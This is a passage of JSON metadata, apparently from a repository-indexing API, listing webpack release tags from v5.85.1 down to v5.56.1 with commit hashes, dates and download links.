ttps://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.1/manifests"},{"name":"v5.85.0","sha":"c80b069dca8eedebfa8ede9ce740891362fdb8bf","kind":"tag","published_at":"2023-05-31T19:20:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.85.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.85.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.85.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.85.0/manifests"},{"name":"v5.84.1","sha":"71d9a21c32974b5166f9ce2f5549849d0c7ad310","kind":"tag","published_at":"2023-05-25T18:35:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.1/manifests"},{"name":"v5.84.0","sha":"4d4caf13add84f996790e5bbdf79b66a548f8273","kind":"tag","published_at":"2023-05-24T17:00:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.84.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.84.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.84.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.84.0/manifests"},{"name":"v5.83.1","sha":"81c8fbde2e0e4b8d2e30a5109dedc082ef8c09dc","kind":"tag","published_at":"2023-05-17T20:22:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.1/manifests"},{"name":"v5.83.0","sha":"ccb3b860520c9472eff3d411a48105f882cf482a","kind":"tag","published_at":"2023-05-17T15:29:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.83.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.83.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.83.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.83.0/manifests"},{"name":"v5.82.1","sha":"a8fd8b7598e8a599871765e0167cacf8318944a9","kind":"tag","published_at":"2023-05-10T15:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.1/manifests"},{"name":"v5.82.0","sha":"1018ca80b31ea72436510398cca5be335b6ac81c","kind":"tag","published_at":"2023-05-03T17:03:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.82.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.82.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.82.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.82.0/manifests"},{"name":"v5.81.0","sha":"5c016a8ec1bbfd73a7fc20d4b474938e61ee3a57","kind":"tag","published_at":"2023-04-26T14:41:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.81.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.81.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.81.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.81.0/manifests"},{"name":"v5.80.0","sha":"9ac1728ee359efbbd1eb317f4a12c0f8136a690e","kind":"tag","published_at":"2023-04-19T16:56:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.80.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.80.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.80.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.80.0/manifests"},{"name":"v5.79.0","sha":"ecdcc1a1d02a3097acb9ebc0896365ae1f4d25e2","kind":"tag","published_at":"2023-04-12T15:12:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.79.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.79.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.79.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.79.0/manifests"},{"name":"v5.78.0","sha":"e51f8347026588c90f9bd91681597e97f24f40c9","kind":"tag","published_at":"2023-04-05T18:09:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.78.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.78.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.78.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.78.0/manifests"},{"name":"v5.77.0","sha":"263f29189060529198b7ab4dbddfd2dca46bd96e","kind":"tag","published_at":"2023-03-29T14:19:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.77.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.77.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.77.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.77.0/manifests"},{"name":"v5.76.3","sha":"8ac9616280aebfb61ae7484f06ad1979d73e6a56","kind":"tag","published_at":"2023-03-22T14:59:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.3/manifests"},{"name":"v5.76.2","sha":"dbf7bf39ab96e1462603435c150d601bb69ebe4e","kind":"tag","published_at":"2023-03-15T15:00:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.2/manifests"},{"name":"v5.76.1","sha":"21be52b681c477f8ebc41c1b0e7a7a8ac4fa7008","kind":"commit","published_at":"2023-03-10T22:59:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.1/manifests"},{"name":"v5.76.0","sha":"97b1718720c33f1b17302a74c5284b01e02ec001","kind":"commit","published_at":"2023-03-08T17:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.76.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.76.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.76.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.76.0/manifests"},{"name":"v5.75.0","sha":"8241da7f1e75c5581ba535d127fa66aeb9eb2ac8","kind":"tag","published_at":"2022-11-09T15:27:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.75.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.75.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.75.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.75.0/manifests"},{"name":"v5.74.0","sha":"8f87b50dc7ac24eb5c91fd0d55a22e34e252863c","kind":"tag","published_at":"2022-07-25T08:00:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.74.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.74.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.74.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.74.0/manifests"},{"name":"v5.73.0","sha":"36051a5ca77b4fa33fac651e1af650c7b910a873","kind":"tag","published_at":"2022-06-02T11:24:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.73.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.73.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.73.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.73.0/manifests"},{"name":"v5.72.1","sha":"08ecfbbc035b12f2ed5c0b83b53011dfe57ae7c9","kind":"tag","published_at":"2022-05-10T10:41:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.1/manifests"},{"name":"v5.72.0","sha":"d3a0f8de03f26a83b4d5db3cfe177617a3801df3","kind":"tag","published_at":"2022-04-07T12:36:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.72.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.72.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.72.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.72.0/manifests"},{"name":"v5.71.0","sha":"c2079f7e7666a913d6fdad4b9102ffb0d3801cc8","kind":"tag","published_at":"2022-04-01T13:41:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.71.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.71.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.71.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.71.0/manifests"},{"name":"v5.70.0","sha":"5a26b7c4a923c42022ca97fe9cbf46907a20d6d8","kind":"tag","published_at":"2022-03-03T14:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.70.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.70.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.70.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.70.0/manifests"},{"name":"v5.69.1","sha":"dfdc8b133d3d49371251e29efeefb9d31b982c9e","kind":"tag","published_at":"2022-02-17T13:46:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.1/manifests"},{"name":"v5.69.0","sha":"9d21401151b32abcefad0ffdb3238da91e2089ef","kind":"tag","published_at":"2022-02-15T12:33:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.69.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.69.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.69.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.69.0/manifests"},{"name":"v5.68.0","sha":"f593d98453e7920bf65f24bf051cd67b5704b59d","kind":"tag","published_at":"2022-01-31T16:25:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.68.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.68.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.68.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.68.0/manifests"},{"name":"v5.67.0","sha":"4abe329dcdaea60371c03c0d85c3a3994d875138","kind":"tag","published_at":"2022-01-21T17:44:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.67.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.67.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.67.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.67.0/manifests"},{"name":"v5.66.0","sha":"0105bc1f005d78e3819a567ffb91432683569070","kind":"tag","published_at":"2022-01-12T08:23:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.66.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.66.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.66.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.66.0/manifests"},{"name":"v5.65.0","sha":"323d65e2b1f6d275bf1b4a93ef753f027de78193","kind":"tag","published_at":"2021-12-06T13:57:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.65.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.65.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.65.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.65.0/manifests"},{"name":"v5.64.4","sha":"d3cd4cb6e38338237fe722d4b7feae2244c425c5","kind":"tag","published_at":"2021-11-25T15:49:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.4/manifests"},{"name":"v5.64.3","sha":"c66e4ce32027fd31935ce9197c219e46308ebd3f","kind":"tag","published_at":"2021-11-24T08:27:45.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.3/manifests"},{"name":"v5.64.2","sha":"0065223c4ddac3bf872bc8d660ef1e9a63afa080","kind":"tag","published_at":"2021-11-20T13:43:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.2/manifests"},{"name":"v5.64.1","sha":"3d5503a5b535b89bbdde78535c1839cefd88e4fa","kind":"tag","published_at":"2021-11-15T17:16:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.1/manifests"},{"name":"v5.64.0","sha":"789e58514b5747f6474bc247e4e104ce22892a2c","kind":"tag","published_at":"2021-11-11T14:16:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.64.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.64.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.64.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.64.0/manifests"},{"name":"v5.63.0","sha":"f011c70aacbd4dd3c4e518b9b9d8ea945dce0a9a","kind":"tag","published_at":"2021-11-09T19:30:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.63.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.63.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.63.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.63.0/manifests"},{"name":"v5.62.2","sha":"3aed1fe0249f8730a35fab62e3cdc3b399b0b6e9","kind":"tag","published_at":"2021-11-09T11:12:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.2/manifests"},{"name":"v5.62.1","sha":"daba59b3d60e7895543b6563682c209e4ad6b8b8","kind":"tag","published_at":"2021-11-05T16:26:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.1/manifests"},{"name":"v5.62.0","sha":"04640dcc757c8b3e78c6cbf6e4dda7cbbde33fe2","kind":"tag","published_at":"2021-11-05T14:56:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.62.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.62.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.62.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.62.0/manifests"},{"name":"v5.61.0","sha":"0306510f7d1b9b13900f1dcf78a767c2ed390a61","kind":"tag","published_at":"2021-10-29T14:00:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.61.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.61.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.61.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.61.0/manifests"},{"name":"v5.60.0","sha":"f0298fe46fc22eebf42eb034a9435d7c19aeddd9","kind":"tag","published_at":"2021-10-25T16:20:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.60.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.60.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.60.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.60.0/manifests"},{"name":"v5.59.1","sha":"3dbbdcb28cce3860247f06a18e48f536ab266834","kind":"tag","published_at":"2021-10-20T21:39:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.1/manifests"},{"name":"v5.59.0","sha":"19ca23f062544263f48d2947da0ecfb29ae0bb36","kind":"tag","published_at":"2021-10-19T17:54:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.59.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.59.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.59.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.59.0/manifests"},{"name":"v5.58.2","sha":"8a6d156c156282dd3d0ba001187c282402a1177f","kind":"tag","published_at":"2021-10-13T09:39:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.2/manifests"},{"name":"v5.58.1","sha":"2eecffb2739d13d3095568d118ffc0baacec5cd8","kind":"tag","published_at":"2021-10-08T13:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.1/manifests"},{"name":"v5.58.0","sha":"7666277551be32947227e80fb2fccdbbe656254b","kind":"tag","published_at":"2021-10-07T15:48:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.58.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.58.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.58.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.58.0/manifests"},{"name":"v5.57.1","sha":"0581bb3c1c32bcb3e182a0f732b862a6c5bb7846","kind":"tag","published_at":"2021-10-05T18:25:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.1/manifests"},{"name":"v5.57.0","sha":"e841ab01417f8e1dd6a2533638f848b5ad0c7d16","kind":"tag","published_at":"2021-10-05T15:06:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.57.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.57.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.57.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.57.0/manifests"},{"name":"v5.56.1","sha":"ed55e200efb0dad7716d509c82a6ed82aee86c51","kind":